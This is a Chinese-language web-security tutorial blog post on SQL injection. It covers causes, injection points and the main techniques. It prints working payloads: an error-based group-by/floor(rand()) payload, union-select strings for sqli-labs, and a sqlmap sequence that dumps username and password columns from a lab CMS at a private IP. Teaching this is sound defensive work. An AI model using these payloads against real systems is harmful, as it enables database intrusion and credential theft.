Web攻防第 02 讲:SQL注入
2022/1/1 2:07:29
本文主要是介绍Web攻防第 02 讲:SQL注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
一、造成SQL注入的原因
- 程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句
- 为对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中
二、注入点可能存在的位置
- GET数据
- POST数据
- Cookie数据
- HTTP头部(HTTP请求报文其他字段)
三、SQL注入存在的危害
攻击者利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理员后台的密码),从而脱取数据库中的内容(俗称脱库)。
四、SQL注入四大基本手法
联合注入
报错注入
在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以进行报错注入。
报错注入的原理,就是在错误信息中执行SQL语句。出发报错的方式有很多,具体细节也不尽相同。建议直接背公式即可,以下为group by重复建冲突公式。
group by重复建冲突
?id=33 and (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2)x from information_schema.tables group by x)a)
布尔盲注
延时注入
堆叠查询(多语句查询)
五、口诀
是否有回显? 联合查询
是否有报错? 报错注入
是否有布尔类型状态? 布尔盲注
绝招 延时注入
六、全自动化注入
6.1、半自动化注入工具burp
6.2、全自动化注入工具sqlmap(kali)
参数描述:
-u:检测注入点
--dbs:列出所有数据库的名字
--current-db:列出当前数据库的名字
-D:指定一个数据库名字
--tables:列出表名,结合-D使用
-T:指定表名称
--columns:列出所有的字段名,结合-T,-D使用
-C:指定字段
--dump:列出字段内容
示例:
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33"
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" --dbs
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" --tables
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" --columns
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username, password" --dump
6.3、sqli-lib
6.3.1、字符型注入
单引号
?id=1
?id=1' and 1=2 union select 1, version(), 3 --+
6.3.2、数字型注入
?id=-2 union select 1,2 database()
6.3.3、字符型注入
')
?id=2') and 1=2 union select 1,2 version() --+
这篇关于Web攻防第 02 讲:SQL注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-26结对编程到底难不难?答案在这里
- 2024-06-19《2023版Java工程师》课程升级公告
- 2024-06-15matplotlib作图不显示3D图,怎么办?
- 2024-06-1503-Loki 日志监控
- 2024-06-1504-让LLM理解知识 -Prompt
- 2024-06-05做软件测试需要懂代码吗?
- 2024-06-0514-ShardingSphere的分布式主键实现
- 2024-06-03为什么以及如何要进行架构设计权衡?
- 2024-05-31全网首发第二弹!软考2024年5月《软件设计师》真题+解析+答案!(11-20题)
- 2024-05-31全网首发!软考2024年5月《软件设计师》真题+解析+答案!(21-30题)